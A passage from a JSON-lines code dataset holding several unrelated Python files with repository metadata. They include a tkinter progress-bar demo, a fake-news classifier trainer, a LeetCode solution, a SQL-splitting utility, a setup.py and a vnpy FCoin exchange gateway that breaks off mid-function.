distiller_loss\n","repo_name":"intel/e2eAIOK","sub_path":"e2eAIOK/ModelAdapter/engine_core/distiller/dkd.py","file_name":"dkd.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"19"} +{"seq_id":"3744926991","text":"import time\r\nimport tkinter.ttk as ttk\r\nfrom tkinter import *\r\n\r\nroot = Tk()\r\nroot.title(\"Mov GUI\")\r\nroot.geometry(\"320x240\")\r\n####################################\r\n\r\n# # progressbar = ttk.Progressbar(root, maximum=100, mode=\"indeterminate\")\r\n# # # indeterminate : infinitly working\r\n# progressbar = ttk.Progressbar(root, maximum=100, mode=\"determinate\")\r\n# # determinate : fill from 0 to 100\r\n\r\n\r\n\r\n# progressbar.start(10) # 10ms moving\r\n# progressbar.pack()\r\n\r\n####################################\r\n# def btncmd():\r\n# progressbar.stop()\r\n####################################\r\n# btn = Button(root, text=\"Stop\", command=btncmd)\r\n# btn.pack()\r\n\r\n\r\n\r\np_var2 = DoubleVar()\r\nprogressbar2 = ttk.Progressbar(root, maximum=100, length=150, variable=p_var2)\r\nprogressbar2.pack()\r\n\r\n\r\ndef btncmd2():\r\n for i in range(1, 101):\r\n time.sleep(0.01) # 0.01 second\r\n\r\n p_var2.set(i) # progress value set\r\n progressbar2.update() # ui update\r\n \r\n\r\n\r\n if i == 20 or i == 50:\r\n print(\"complated {}%\".format(i))\r\n elif i == 100:\r\n print(\"Done {}%\".format(i))\r\n \r\nbtn2 = Button(root, text=\"Start\", command=btncmd2)\r\nbtn2.pack()\r\n\r\n\r\n\r\nroot.mainloop()\r\n","repo_name":"yacmov/Self_Study_Python","sub_path":"03_GUI/01_GUI_basic/09_Progressbar.py","file_name":"09_Progressbar.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"44637970646","text":"import pandas as pd\r\nimport re\r\nfrom nltk.corpus import stopwords\r\nfrom nltk.stem.porter import PorterStemmer\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.linear_model import LogisticRegression\r\nimport joblib\r\nimport nltk\r\nnltk.download('stopwords')\r\n# Printing the stopwords in English\r\n\r\n# print(stopwords.words('english'))\r\n\r\n# Loading the dataset to a pandas DataFrame\r\nnews_dataset = pd.read_csv('C:\\\\Users\\\\Arjit\\\\Desktop\\\\train.csv')\r\n\r\n# news_dataset.shape\r\n# print the first 5 rows of the dataframe\r\nnews_dataset.head()\r\n\r\n# counting the number of missing values in the dataset\r\nnews_dataset.isnull().sum()\r\n\r\n# replacing the null values with empty string\r\nnews_dataset = news_dataset.fillna('')\r\n\r\n# merging the author name and news title\r\nnews_dataset['content'] = news_dataset['author']+' '+news_dataset['title']\r\n\r\n# separating the data & label\r\nX = news_dataset.drop(columns='label', axis=1)\r\nY = news_dataset['label']\r\n\r\nport_stem = PorterStemmer()\r\n\r\n\r\ndef stemming(content):\r\n stemmed_content = re.sub('[^a-zA-Z]', ' ', content)\r\n stemmed_content = stemmed_content.lower()\r\n stemmed_content = stemmed_content.split()\r\n stemmed_content = [port_stem.stem(word) for word in stemmed_content if word not in stopwords.words('english')]\r\n stemmed_content = ' '.join(stemmed_content)\r\n return stemmed_content\r\n\r\n\r\nnews_dataset['content'] = news_dataset['content'].apply(stemming)\r\n\r\n# noinspection PyRedeclaration\r\nX = news_dataset['content'].values\r\n# noinspection PyRedeclaration\r\nY = news_dataset['label'].values\r\n\r\n# converting the textual data to numerical data\r\nvectorizer = TfidfVectorizer()\r\nvectorizer.fit(X)\r\n\r\nX = vectorizer.transform(X)\r\n\r\nmodel = LogisticRegression()\r\nmodel = model.fit(X, Y)\r\njoblib.dump(model, 'news_model')\r\njoblib.dump(vectorizer, 'vectorizer.pkl')\r\n","repo_name":"arjitgupta00/Fake-News-Detection-Model","sub_path":"Trainer.py","file_name":"Trainer.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"39461719412","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n'''\nStrategy: BFS traversal of a tree. Construct the next level to explore base on the children of the current level and include Nulls.\nWhile exploring a level also keep track of its width.\n The existence of a node creates a width of 1. Gaps of null children are fine if they end up being enclosed.\n Need a little algorithm to return the width of a layer given its\n\nThere's a question about counting Nulls here that I don't have an answer for that would change everything.\nDo you count all actual Nulls or the possible Nulls in the middle? Yes you do. E.g. [1,3,2,5,null,null,9,6,null,null,7]\ngives 8 instead of 4\n'''\n\n\nclass Solution:\n def widthOfBinaryTree(self, root):\n level = [(root, 0)]\n max_width = 0\n while len(level) > 0:\n next_level = []\n left = -1\n width = 0\n for node in level:\n # Track width \n if node[0] is not None:\n if left == -1:\n left = node[1]\n width = node[1] - left + 1\n \n next_level.append((node[0].left, 2*node[1]))\n next_level.append((node[0].right, 2*node[1]+1))\n level = next_level\n if width > max_width:\n max_width = width\n return max_width\n\n\n # Create next level\n\nif __name__ == \"__main__\":\n sol = Solution()\n \n t6 = TreeNode(9)\n t5 = TreeNode(3)\n t4 = TreeNode(5)\n\n t2 = TreeNode(3, t4, t5)\n t3 = TreeNode(2, None, t6)\n\n t1 = TreeNode(1, t2, t3)\n\n print(sol.widthOfBinaryTree(t1))","repo_name":"drewserles/LeetCodeChallenges","sub_path":"601-700/p662.py","file_name":"p662.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"26095343440","text":"import pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\n\r\n#reading in the data\r\ndef create_panda_frame(filename):\r\n \"\"\"create panda dataframe of csv file with ';' as separator\"\"\"\r\n with open(filename, encoding='utf-8') as datafile:\r\n df = pd.read_csv(datafile, index_col=0, sep=';')\r\n return df\r\n\r\nstudent_dataframe = create_panda_frame('student_data.csv')\r\n\r\n#plot how many students were enrolled in which year\r\ndata1 = create_panda_frame('student_data.csv')\r\ndf = data1.groupby('Year')[[\"Master\", \"Bachelor\", \"Doctorate\"]].sum()\r\n\r\nsns.lineplot(data=df, palette = \"dark\")\r\nplt.title(\"Students\")\r\nplt.show()\r\n\r\n#plotting student of the year 2021/22\r\ndata1 = create_panda_frame('student_data.csv')\r\nyear = data1.loc['2021/22']\r\nyear.groupby(by = 'ISCED Field', as_index = False).sum()\r\nyear = year.assign(Sum = year['Bachelor'] + year[\"Master\"] + year[\"Doctorate\"])\r\nsns.set(rc = {'figure.figsize':(10,20)})\r\nax = sns.barplot(x=\"Sum\", y=\"ISCED Field\", data=year, ci = None)\r\n\r\n#gender distribution of students in humanities fields\r\ndata2 = pd.read_csv(\"student_data.csv\", encoding = \"utf-8\", sep=';')\r\ncomparison = data2[data2[\"ISCED Field\"].isin([\"Political sciences and civics\", \"Psychology\",\r\n \"History and archaeology\", \"Economics\", \"Law\"])]\r\ncomparison['Number of students'] = comparison.sum(axis=1)\r\ncomparison = comparison.loc[:, ~comparison.columns.isin(['Bachelor', 'Master', \"Doctorate\"])]\r\nprint(comparison)\r\n\r\n\r\nplot = sns.FacetGrid(data = comparison, col = \"Sex\", hue = \"ISCED Field\", palette = \"tab10\")\r\nplot.map(sns.lineplot, \"Year\", \"Number of students\")\r\nplot.add_legend()\r\n\r\nplot.set_xticklabels(rotation=45)\r\nplt.show()","repo_name":"Hiraiu/DataExploration","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38606503848","text":"#!/usr/bin/env python\n\nimport re\nimport os\nimport errno\nimport sys\nimport glob\nfrom argparse import ArgumentParser\n\ndef write_data_to_file(folder,file_name, list_data):\n if not os.path.exists(\"./\"+folder):\n try:\n os.makedirs(\"./\"+folder)\n except OSError as error:\n if error.errno != errno.EEXIST:\n raise\n with open(\"./\"+ folder + \"/\" + file_name + \".sql\", 'a+') as my_file:\n my_file.writelines(list_data)\n my_file.close()\n\ndef write_ddl_to_file(x,y,lines,f_extns,extn):\n if x != 0 :\n match = re.findall(r\"CREATE (.*)\", str(lines[y]))\n if match:\n file=str(match).split() \n if file[1] == \"REPLACE\" :\n file_name = file[3].strip().replace(\";\\']\",\"\")\n else:\n file_name = file[1].strip().replace(\";\\']\",\"\")\n file_name = file_name.replace(f_extns[0] + \".\",\"\")\n if y == x-1 :\n write_data_to_file(extn+f_extns[0],str(file_name), lines[y])\n else:\n write_data_to_file(extn+f_extns[0],str(file_name), lines[y: x-1])\n match = re.findall(r\"DROP (.*)\", str(lines[y]))\n if match:\n file=str(match).split() \n file_name = file[1].strip().replace(\";\\']\",\"\")\n file_name = file_name.replace(f_extns[0] + \".\",\"\")\n if y == x-1 :\n write_data_to_file(extn+f_extns[0],str(file_name), lines[y])\n else:\n write_data_to_file(extn+f_extns[0],str(file_name), lines[y: x-1])\n\ndef convert_semi_to_newline(filename): \n localFile = open(filename, 'r')\n data=localFile.read()\n data = data.replace(';',';\\n') \n data = data.replace('\"','') \n fin = open(filename, \"wt\")\n fin.write(data)\n fin.close()\n f_extns = filename.split(\".\")\n with open(filename) as f:\n count = sum(1 for _ in f)\n localFile = open(filename, 'r')\n lines = localFile.readlines()\n return [filename , lines , count, f_extns]\n\ndef check_table_view(lines,f_extns,extn,count):\n line_numbers = 0\n x = 0\n y = 0\n z = 0\n for line in lines:\n if '-- DDL Statements for Table' in line:\n del lines[line_numbers]\n \n if 'DROP TABLE' in line or 'DROP VIEW' in line:\n y = x\n x = line_numbers\n write_ddl_to_file(x,y,lines,f_extns,extn) \n\n if 'CREATE TABLE' in line or 'CREATE VIEW' in line or 'CREATE OR REPLACE' in line: \n \n if 'CREATE' in lines[z]:\n y = x\n x = line_numbers\n write_ddl_to_file(x,y,lines,f_extns,extn)\n else:\n z = line_numbers \n\n line_numbers = line_numbers+1\n write_ddl_to_file(count,x,lines,f_extns,extn)\n\n\ndef create_files_using_file(filename):\n responseData=convert_semi_to_newline(filename)\n filename=responseData[0]\n lines=responseData[1]\n count=responseData[2]\n f_extns=responseData[3]\n extn=\"\"\n check_table_view(lines,f_extns,extn,count)\n \ndef create_files_using_directory(directory):\n if not os.path.exists(\"./Output/\"):\n try:\n os.makedirs(\"./Output\")\n except OSError as error:\n if error.errno != errno.EEXIST:\n raise\n filenames= glob.glob('./' + directory + '/*.*') \n for filename in filenames: \n f=open(filename, 'r') \n directory, folder=os.path.split(filename)\n print(filename)\n f.read()\n f.close() \n f_extns = folder.split(\".\")\n extn=\"./Output/\" \n responseData=convert_semi_to_newline(filename)\n filename=responseData[0]\n lines=responseData[1]\n count=responseData[2] \n check_table_view(lines,f_extns,extn,count)\n\ndef main(args=sys.argv[1:]):\n _arguments_check(args)\n # print(len(args))\n # for index,arg in enumerate(args):\n # if '-f' in arg:\n # create_files_using_file(args[index+1])\n # if '-D' in arg:\n # create_files_using_directory(args[index+1])\n\n''' ------------------------------------------------------------------------- '''\n\n\ndef _read_args(call_args):\n parser = ArgumentParser('dbsplitsql')\n parser.add_argument('-f', '--file', dest='file',\n action='store_true', default=False,\n help='Process sql file.')\n parser.add_argument('-d', '--directory', dest='directory',\n action='store_true', default=False,\n help='Process sql files found in directory & subdirectories.')\n parser.add_argument('--version', action='version',\n version='dbsplitsql 0.0.8')\n args, _unused_unknown_args = parser.parse_known_args(call_args)\n return args\n\n\ndef _show_exception(message):\n print(\"Error: \" + message)\n os._exit(1)\n\n\ndef _arguments_check(args=sys.argv[1:]):\n read_args = _read_args(args)\n\n ''' check for either file or directory input '''\n if not (read_args.file or read_args.directory):\n _show_exception(\"Pass SQL File/Directory with respective flags.\")\n\n if read_args.file:\n file_index = args.index(\"-f\")\n try:\n file_name = args[file_index + 1]\n if not file_name:\n _show_exception(\"Input valid .sql file\")\n else:\n create_files_using_file(file_name)\n except:\n _show_exception(\"Input valid .sql file\")\n\n if read_args.directory:\n directory_index = args.index(\"-d\")\n try:\n d_name = args[directory_index + 1]\n if not d_name:\n _show_exception(\"Input directory.\")\n else:\n create_files_using_directory(d_name)\n except:\n _show_exception(\"Input directory.\")\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"balagdivya/dbsplitsql","sub_path":"dbsplitsql/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5885,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"6847172090","text":"#What is the smallest positive number that is evenly divisible by all of the numbers from 1 to 20?\n\n\ndef devisible_by_1_to_20(n):\n primes = [7,9,11,13,16,17,19]\n for i in primes:\n if n % i != 0:\n return False\n return True\n\nnumber = 2000\nwhile True:\n if devisible_by_1_to_20(number):\n print(number)\n break\n number +=160 #reduce for accuracy\n","repo_name":"cryptozealot/projecteuler","sub_path":"005.py","file_name":"005.py","file_ext":"py","file_size_in_byte":387,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"10741253675","text":"import pyautogui\r\nimport keyboard\r\nimport time\r\n\r\nwith open(input(\"FILENAME: \"), \"r\") as f:\r\n tables = f.readlines()\r\n\r\nprint (tables)\r\n\r\nkeyboard.wait(\"\\n\")\r\ntime.sleep(3)\r\ndef thing():\r\n for line in tables:\r\n line.replace(\"\\n\",\"\")\r\n print(line)\r\n pyautogui.write(line, 0.005)\r\n pyautogui.write(\"\\n\")\r\nthing()\r\n","repo_name":"spinjrock/Goofy-Goober-Repo","sub_path":"translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20529155442","text":"from setuptools import setup\nimport os\n\nimport pychubby\n\nINSTALL_REQUIRES = [\n \"click>=7.0\",\n \"matplotlib>=2.0.0\",\n \"numpy>=1.16.4\",\n \"opencv-python>=4.1.0.25\",\n \"scikit-image\",\n]\n\nif \"RTD_BUILD\" not in os.environ:\n # ReadTheDocs cannot handle compilation\n INSTALL_REQUIRES += [\"dlib\"]\n\nLONG_DESCRIPTION = \"Automated face warping tool\"\nPROJECT_URLS = {\n \"Bug Tracker\": \"https://github.com/jankrepl/pychubby/issues\",\n \"Documentation\": \"https://pychubby.readthedocs.io\",\n \"Source Code\": \"https://github.com/jankrepl/pychubby\",\n}\nVERSION = pychubby.__version__\n\nsetup(\n name=\"pychubby\",\n version=VERSION,\n author=\"Jan Krepl\",\n author_email=\"kjan.official@gmail.com\",\n description=\"Automated face warping tool\",\n long_description=LONG_DESCRIPTION,\n url=\"https://github.com/jankrepl/pychubby\",\n project_urls=PROJECT_URLS,\n packages=[\"pychubby\"],\n license=\"MIT\",\n classifiers=[\n \"License :: OSI Approved :: MIT License\",\n \"Intended Audience :: Science/Research\",\n \"Intended Audience :: Developers\",\n \"Programming Language :: C\",\n \"Programming Language :: Python\",\n \"Topic :: Software Development\",\n \"Topic :: Scientific/Engineering\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: POSIX\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"Programming Language :: Python :: 3.7\",\n (\"Programming Language :: Python :: \" \"Implementation :: CPython\"),\n ],\n python_requires='>=3.5',\n install_requires=INSTALL_REQUIRES,\n extras_require={\n \"dev\": [\"codecov\", \"flake8\", \"pydocstyle\", \"pytest>=3.6\", \"pytest-cov\", \"tox\"],\n \"docs\": [\"sphinx\", \"sphinx_rtd_theme\"],\n },\n entry_points={\"console_scripts\": [\"pc = pychubby.cli:cli\"]},\n)\n","repo_name":"jankrepl/pychubby","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":289,"dataset":"github-code","pt":"35"} +{"seq_id":"31751324306","text":"# encoding: UTF-8\n\n'''\nvnpy.api.fcoin的gateway接入\n'''\nfrom __future__ import print_function\n\nimport os\nimport json\nimport time\nimport traceback\nfrom datetime import datetime, timedelta\nfrom copy import copy\nfrom math import pow\n\nfrom vnpy.api.fcoin import FcoinRestApi, FcoinWebsocketApi\nfrom vnpy.trader.vtGateway import *\nfrom vnpy.trader.vtFunction import getJsonPath, getTempPath\n\n# 委托状态类型映射\nstatusMapReverse = {}\nstatusMapReverse['submitted'] = STATUS_NOTTRADED\nstatusMapReverse['partial_filled'] = STATUS_PARTTRADED\nstatusMapReverse['partial_canceled'] = STATUS_CANCELLED\nstatusMapReverse['filled'] = STATUS_ALLTRADED\nstatusMapReverse['canceled'] = STATUS_CANCELLED\nstatusMapReverse['pending_cancel'] = STATUS_UNKNOWN\n\n# 方向映射\ndirectionMap = {}\ndirectionMap[DIRECTION_LONG] = 'buy'\ndirectionMap[DIRECTION_SHORT] = 'sell'\ndirectionMapReverse = {v:k for k,v in directionMap.items()}\n\n# 价格类型映射\npriceTypeMap = {}\npriceTypeMap[PRICETYPE_LIMITPRICE] = 'limit'\npriceTypeMap[PRICETYPE_MARKETPRICE] = 'market'\n\n\n\n########################################################################\nclass FcoinGateway(VtGateway):\n \"\"\"FCOIN接口\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self, eventEngine, gatewayName=''):\n \"\"\"Constructor\"\"\"\n super(FcoinGateway, self).__init__(eventEngine, gatewayName)\n\n self.restApi = RestApi(self)\n self.wsApi = WebsocketApi(self)\n\n self.qryEnabled = False # 是否要启动循环查询\n\n self.fileName = self.gatewayName + '_connect.json'\n self.filePath = getJsonPath(self.fileName, __file__)\n\n #----------------------------------------------------------------------\n def connect(self):\n \"\"\"连接\"\"\"\n try:\n f = file(self.filePath)\n except IOError:\n log = VtLogData()\n log.gatewayName = self.gatewayName\n log.logContent = u'读取连接配置出错,请检查'\n self.onLog(log)\n return\n\n # 解析json文件\n setting = json.load(f)\n try:\n apiKey = str(setting['apiKey'])\n apiSecret = str(setting['apiSecret'])\n symbols = setting['symbols']\n except KeyError:\n log = VtLogData()\n log.gatewayName = self.gatewayName\n log.logContent = u'连接配置缺少字段,请检查'\n self.onLog(log)\n return\n\n # 创建行情和交易接口对象\n self.restApi.connect(apiKey, apiSecret, symbols)\n self.wsApi.connect(apiKey, apiSecret, symbols)\n\n # 初始化并启动查询\n self.initQuery()\n\n #----------------------------------------------------------------------\n def subscribe(self, subscribeReq):\n \"\"\"订阅行情\"\"\"\n pass\n\n #----------------------------------------------------------------------\n def sendOrder(self, orderReq):\n \"\"\"发单\"\"\"\n return self.restApi.sendOrder(orderReq)\n\n #----------------------------------------------------------------------\n def cancelOrder(self, cancelOrderReq):\n \"\"\"撤单\"\"\"\n self.restApi.cancelOrder(cancelOrderReq)\n\n #----------------------------------------------------------------------\n def close(self):\n \"\"\"关闭\"\"\"\n self.restApi.close()\n self.wsApi.close()\n \n #----------------------------------------------------------------------\n def initQuery(self):\n \"\"\"初始化连续查询\"\"\"\n if self.qryEnabled:\n # 需要循环的查询函数列表\n self.qryFunctionList = [self.restApi.qryPosition,\n self.restApi.qryOrderSubmitted,\n self.restApi.qryOrderPartialFilled,\n self.restApi.qryOrderCanceled,\n self.restApi.qryOrderFilled,\n self.restApi.qryOrderPartialCanceled]\n \n self.qryCount = 0 # 查询触发倒计时\n self.qryTrigger = 3 # 查询触发点\n self.qryNextFunction = 0 # 上次运行的查询函数索引\n\n self.startQuery()\n\n #----------------------------------------------------------------------\n def query(self, event):\n \"\"\"注册到事件处理引擎上的查询函数\"\"\"\n self.qryCount += 1\n\n if self.qryCount > self.qryTrigger:\n # 清空倒计时\n self.qryCount = 0\n\n # 执行查询函数\n function = self.qryFunctionList[self.qryNextFunction]\n function()\n\n # 计算下次查询函数的索引,如果超过了列表长度,则重新设为0\n self.qryNextFunction += 1\n if self.qryNextFunction == len(self.qryFunctionList):\n self.qryNextFunction = 0\n\n #----------------------------------------------------------------------\n def startQuery(self):\n \"\"\"启动连续查询\"\"\"\n self.eventEngine.register(EVENT_TIMER, self.query)\n\n #----------------------------------------------------------------------\n def setQryEnabled(self, qryEnabled):\n \"\"\"设置是否要启动循环查询\"\"\"\n self.qryEnabled = qryEnabled\n\n\n########################################################################\nclass RestApi(FcoinRestApi):\n \"\"\"REST API实现\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self, gateway):\n \"\"\"Constructor\"\"\"\n super(RestApi, self).__init__()\n\n self.gateway = gateway # gateway对象\n self.gatewayName = gateway.gatewayName # gateway对象名称\n \n self.localID = 0\n self.tradeID = 0\n \n self.orderDict = {} # sysID:order\n self.localSysDict = {} # localID:sysID\n self.reqOrderDict = {} # reqID:order\n self.cancelDict = {} # localID:req\n \n #----------------------------------------------------------------------\n def connect(self, apiKey, apiSecret, symbols):\n \"\"\"连接服务器\"\"\"\n self.init(apiKey, apiSecret)\n self.start()\n \n self.symbols = symbols\n self.writeLog(u'REST API启动成功')\n \n self.qryContract()\n \n #----------------------------------------------------------------------\n def writeLog(self, content):\n \"\"\"发出日志\"\"\"\n log = VtLogData()\n log.gatewayName = self.gatewayName\n log.logContent = content\n self.gateway.onLog(log)\n \n #----------------------------------------------------------------------\n def sendOrder(self, orderReq):\n \"\"\"\"\"\"\n #orderReq.price = 300.0\n #orderReq.volume = 0.01\n \n self.localID += 1\n orderID = str(self.localID)\n vtOrderID = '.'.join([self.gatewayName, orderID])\n \n req = {\n 'symbol': orderReq.symbol,\n 'side': directionMap[orderReq.direction],\n 'type': priceTypeMap[orderReq.priceType],\n 'price': orderReq.price,\n 'amount': orderReq.volume\n }\n \n reqid = self.addReq('POST', '/orders', self.onSendOrder, postdict=req)\n \n # 缓存委托数据对象\n order = VtOrderData()\n order.gatewayName = self.gatewayName\n order.symbol = orderReq.symbol\n order.exchange = EXCHANGE_FCOIN\n order.vtSymbol = '.'.join([order.symbol, order.exchange])\n order.orderID = orderID\n order.vtOrderID = vtOrderID\n order.price = orderReq.price\n order.totalVolume = orderReq.volume\n order.direction = orderReq.direction\n order.status = STATUS_UNKNOWN\n \n self.reqOrderDict[reqid] = order\n \n return vtOrderID\n \n #----------------------------------------------------------------------\n def cancelOrder(self, cancelOrderReq):\n \"\"\"\"\"\"\n localID = cancelOrderReq.orderID\n \n if localID in self.localSysDict:\n sysID = self.localSysDict[localID]\n path = '/orders/%s/submit-cancel' %sysID\n self.addReq('POST', path, self.onCancelOrder)\n else:\n self.cancelDict[localID] = cancelOrderReq\n\n #----------------------------------------------------------------------\n def qryContract(self):\n \"\"\"\"\"\"\n self.addReq('GET', '/public/symbols', self.onQryContract)\n\n #----------------------------------------------------------------------\n def qryOrder(self, state):\n \"\"\"\"\"\"\n for symbol in self.symbols:\n req = {\n 'symbol': symbol,\n 'states': state,\n 'limit': 50\n }\n self.addReq('GET', '/orders', self.onQryOrder, params=req)\n \n #----------------------------------------------------------------------\n def qryOrderSubmitted(self):\n \"\"\"\"\"\"\n self.qryOrder('submitted')\n \n #----------------------------------------------------------------------\n def qryOrderPartialFilled(self):\n \"\"\"\"\"\"\n self.qryOrder('partial_filled')\n \n #----------------------------------------------------------------------\n def qryOrderPartialCanceled(self):\n \"\"\"\"\"\"\n self.qryOrder('partial_canceled')\n \n #----------------------------------------------------------------------\n def qryOrderFilled(self):\n \"\"\"\"\"\"\n self.qryOrder('filled')\n \n #----------------------------------------------------------------------\n def qryOrderCanceled(self):\n \"\"\"\"\"\"\n self.qryOrder('canceled')\n \n #----------------------------------------------------------------------\n def qryPosition(self):\n \"\"\"\"\"\"\n self.addReq('GET', '/accounts/balance', self.onQryPosition)\n \n #----------------------------------------------------------------------\n def onSendOrder(self, data, reqid):\n \"\"\"\"\"\"\n if 'msg' in data:\n self.writeLog(data['msg'])\n return\n \n if 'data' in data:\n order = self.reqOrderDict[reqid]\n localID = order.orderID\n sysID = data['data']\n \n self.localSysDict[localID] = sysID\n self.orderDict[sysID] = order\n \n self.gateway.onOrder(order)\n \n # 发出等待的撤单委托\n if localID in self.cancelDict:\n req = self.cancelDict[localID]\n self.cancelOrder(req)\n del self.cancelDict[localID]\n \n #----------------------------------------------------------------------\n def onCancelOrder(self, data, reqid):\n \"\"\"\"\"\"\n pass \n \n #----------------------------------------------------------------------\n def onError(self, code, error):\n \"\"\"\"\"\"\n msg = u'发生异常,错误代码:%s,错误信息:%s' %(code, error)\n self.writeLog(msg)\n \n #----------------------------------------------------------------------\n def onQryOrder(self, data, reqid):\n \"\"\"\"\"\"\n data['data'].reverse()\n \n for d in data['data']:\n orderUpdated = False\n tradeUpdated = False\n \n # 获取委托对象\n sysID = d['id']\n if sysID in self.orderDict:\n order = self.orderDict[sysID]\n else:\n order = VtOrderData()\n order.gatewayName = self.gatewayName\n \n order.symbol = d['symbol']\n order.exchange = EXCHANGE_FCOIN\n order.vtSymbol = '.'.join([order.symbol, order.exchange])\n \n self.localID += 1\n localID = str(self.localID)\n self.localSysDict[localID] = sysID\n \n order.orderID = localID\n order.vtOrderID = '.'.join([order.gatewayName, order.orderID])\n \n order.direction = directionMapReverse[d['side']]\n order.price = float(d['price'])\n order.totalVolume = float(d['amount'])\n \n dt = datetime.fromtimestamp(d['created_at']/1000)\n order.orderTime = dt.strftime('%H:%M:%S')\n \n self.orderDict[sysID] = order\n orderUpdated = True\n \n # 检查是否委托有变化\n newTradedVolume = float(d['filled_amount'])\n newStatus = statusMapReverse[d['state']]\n \n if newTradedVolume != float(order.tradedVolume) or newStatus != order.status:\n orderUpdated = True\n \n if newTradedVolume != float(order.tradedVolume):\n tradeUpdated = True\n newVolume = newTradedVolume - order.tradedVolume\n \n order.tradedVolume = newTradedVolume\n order.status = newStatus\n \n # 若有更新才推送\n if orderUpdated:\n self.gateway.onOrder(order) \n \n if tradeUpdated:\n # 推送成交\n trade = VtTradeData()\n trade.gatewayName = order.gatewayName\n \n trade.symbol = order.symbol\n trade.vtSymbol = order.vtSymbol\n \n trade.orderID = order.orderID\n trade.vtOrderID = order.vtOrderID\n \n self.tradeID += 1\n trade.tradeID = str(self.tradeID)\n trade.vtTradeID = '.'.join([self.gatewayName, trade.tradeID])\n \n trade.direction = order.direction\n trade.price = order.price\n trade.volume = newTradedVolume\n trade.tradeTime = datetime.now().strftime('%H:%M:%S')\n \n self.gateway.onTrade(trade)\n\n #----------------------------------------------------------------------\n def onQryPosition(self, data, reqid):\n \"\"\"\"\"\"\n for d in data['data']:\n account = VtAccountData()\n account.gatewayName = self.gatewayName\n \n account.accountID = d['currency']\n account.vtAccountID = '.'.join([account.gatewayName, account.accountID])\n account.balance = float(d['balance'])\n account.available = account.balance - float(d['frozen'])\n \n self.gateway.onAccount(account) \n \n #----------------------------------------------------------------------\n def onQryContract(self, data, reqid):\n \"\"\"\"\"\"\n for d in data['data']:\n contract = VtContractData()\n contract.gatewayName = self.gatewayName\n \n contract.symbol = d['name']\n contract.exchange = EXCHANGE_FCOIN\n contract.vtSymbol = '.'.join([contract.symbol, contract.exchange])\n contract.name = contract.vtSymbol\n contract.productClass = PRODUCT_SPOT\n contract.priceTick = pow(10, -int(d['price_decimal']))\n contract.size = 1\n \n self.gateway.onContract(contract) \n \n self.writeLog(u'合约信息查询完成')\n \n\n########################################################################\nclass WebsocketApi(FcoinWebsocketApi):\n \"\"\"\"\"\"\n\n #----------------------------------------------------------------------\n def __init__(self, gateway):\n \"\"\"Constructor\"\"\"\n super(WebsocketApi, self).__init__()\n \n self.gateway = gateway\n self.gatewayName = gateway.gatewayName\n \n self.apiKey = ''\n self.apiSecret = ''\n self.symbols = []\n \n self.tickDict = {}\n \n #----------------------------------------------------------------------\n def connect(self, apiKey, apiSecret, symbols):\n \"\"\"\"\"\"\n self.apiKey = apiKey\n self.apiSecret = apiSecret\n self.symbols = symbols\n \n self.start()\n \n #----------------------------------------------------------------------\n def onConnect(self):\n \"\"\"连接回调\"\"\"\n self.writeLog(u'Websocket API连接成功')\n \n #----------------------------------------------------------------------\n def subscribe(self):\n \"\"\"\"\"\"\n l = []\n for symbol in self.symbols:\n l.append('ticker.' + symbol)\n l.append('depth.L20.' + symbol)\n \n tick = VtTickData()\n tick.gatewayName = self.gatewayName\n tick.symbol = symbol\n tick.exchange = EXCHANGE_FCOIN\n tick.vtSymbol = '.'.join([tick.symbol, tick.exchange])\n self.tickDict[symbol] = tick\n \n req = {\n 'cmd': 'sub',\n 'args': l,\n 'id': 1\n }\n self.sendReq(req)\n \n #----------------------------------------------------------------------\n def onData(self, data):\n \"\"\"数据回调\"\"\"\n type_ = data['type']\n if 'hello' in type_:\n self.subscribe()\n elif 'ticker' in type_:\n self.onTick(data)\n elif 'depth' in type_:\n self.onDepth(data)\n \n #----------------------------------------------------------------------\n def onError(self, msg):\n \"\"\"错误回调\"\"\"\n self.writeLog(msg)\n \n #----------------------------------------------------------------------\n def writeLog(self, content):\n \"\"\"发出日志\"\"\"\n log = VtLogData()\n log.gatewayName = self.gatewayName\n log.logContent = content\n self.gateway.onLog(log) \n \n #----------------------------------------------------------------------\n def onTick(self, d):\n \"\"\"\"\"\"\n symbol = d['type'].split('.')[-1]\n tick = self.tickDict[symbol]\n \n ticker = d['ticker']\n tick.openPrice = ticker[6]\n tick.highPrice = ticker[7]\n tick.lowPrice = ticker[8]\n tick.lastPrice = ticker[0]\n tick.volume = ticker[9]\n \n if tick.askPrice1:\n self.gateway.onTick(copy(tick))\n\n #----------------------------------------------------------------------\n def onDepth(self, d):\n \"\"\"\"\"\"\n symbol = d['type'].split('.')[-1]\n tick = self.tickDict[symbol] \n \n bids = d['bids']\n asks = d['asks']\n \n 